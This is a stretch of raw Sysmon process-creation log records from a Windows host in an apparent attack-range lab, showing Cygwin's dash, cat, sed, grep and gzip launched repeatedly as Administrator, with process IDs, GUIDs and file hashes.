14:55:54.652{A8622C2F-53FA-6078-7A08-00000000AE01}6336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046936Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.644{A8622C2F-53FA-6078-7908-00000000AE01}5344C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-7808-00000000AE01}6672C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046926Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.637{A8622C2F-53FA-6078-7808-00000000AE01}6672C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046914Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.628{A8622C2F-53FA-6078-7708-00000000AE01}1800C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-7508-00000000AE01}5312C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046897Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.621{A8622C2F-53FA-6078-7608-00000000AE01}5828C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-7308-00000000AE01}5108C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046894Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.621{A8622C2F-53FA-6078-7508-00000000AE01}5312C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046875Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.614{A8622C2F-53FA-6078-7408-00000000AE01}5404C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-7208-00000000AE01}7140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046874Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.614{A8622C2F-53FA-6078-7308-00000000AE01}5108C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046862Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.607{A8622C2F-53FA-6078-7208-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046849Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.599{A8622C2F-53FA-6078-7108-00000000AE01}5852C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-7008-00000000AE01}5628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046839Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.592{A8622C2F-53FA-6078-7008-00000000AE01}5628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046827Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.583{A8622C2F-53FA-6078-6F08-00000000AE01}6440C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-6D08-00000000AE01}4412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046809Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.576{A8622C2F-53FA-6078-6E08-00000000AE01}5640C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-6B08-00000000AE01}1496C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046807Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.576{A8622C2F-53FA-6078-6D08-00000000AE01}4412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046789Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.568{A8622C2F-53FA-6078-6C08-00000000AE01}4788C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-6A08-00000000AE01}616C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046787Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.568{A8622C2F-53FA-6078-6B08-00000000AE01}1496C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046775Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.561{A8622C2F-53FA-6078-6A08-00000000AE01}616C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046762Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.552{A8622C2F-53FA-6078-6908-00000000AE01}4160C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-6808-00000000AE01}6456C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046752Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.545{A8622C2F-53FA-6078-6808-00000000AE01}6456C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046740Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.536{A8622C2F-53FA-6078-6708-00000000AE01}4336C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-6508-00000000AE01}6336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046720Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.529{A8622C2F-53FA-6078-6608-00000000AE01}3912C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-6308-00000000AE01}1628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046719Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.528{A8622C2F-53FA-6078-6508-00000000AE01}6336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046700Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.521{A8622C2F-53FA-6078-6408-00000000AE01}1800C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-6208-00000000AE01}3304C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046699Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.521{A8622C2F-53FA-6078-6308-00000000AE01}1628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046687Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.514{A8622C2F-53FA-6078-6208-00000000AE01}3304C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046675Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.506{A8622C2F-53FA-6078-6108-00000000AE01}4364C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-6008-00000000AE01}6032C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046665Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.499{A8622C2F-53FA-6078-6008-00000000AE01}6032C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046652Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.491{A8622C2F-53FA-6078-5F08-00000000AE01}7140C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-5D08-00000000AE01}3008C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046634Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.483{A8622C2F-53FA-6078-5E08-00000000AE01}5412C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-5B08-00000000AE01}6452C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046632Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.483{A8622C2F-53FA-6078-5D08-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046614Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.476{A8622C2F-53FA-6078-5C08-00000000AE01}5396C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-5A08-00000000AE01}3208C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046612Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.476{A8622C2F-53FA-6078-5B08-00000000AE01}6452C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046600Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.469{A8622C2F-53FA-6078-5A08-00000000AE01}3208C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046588Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.461{A8622C2F-53FA-6078-5908-00000000AE01}6968C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-5808-00000000AE01}6884C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046578Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.454{A8622C2F-53FA-6078-5808-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046565Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.445{A8622C2F-53FA-6078-5708-00000000AE01}616C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-5508-00000000AE01}6416C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046548Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.437{A8622C2F-53FA-6078-5608-00000000AE01}4160C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-5308-00000000AE01}4056C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046545Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.437{A8622C2F-53FA-6078-5508-00000000AE01}6416C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046527Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.430{A8622C2F-53FA-6078-5408-00000000AE01}2084C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-5208-00000000AE01}2508C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046525Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.429{A8622C2F-53FA-6078-5308-00000000AE01}4056C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046513Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.423{A8622C2F-53FA-6078-5208-00000000AE01}2508C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046500Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.414{A8622C2F-53FA-6078-5108-00000000AE01}5312C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-5008-00000000AE01}6268C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046490Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 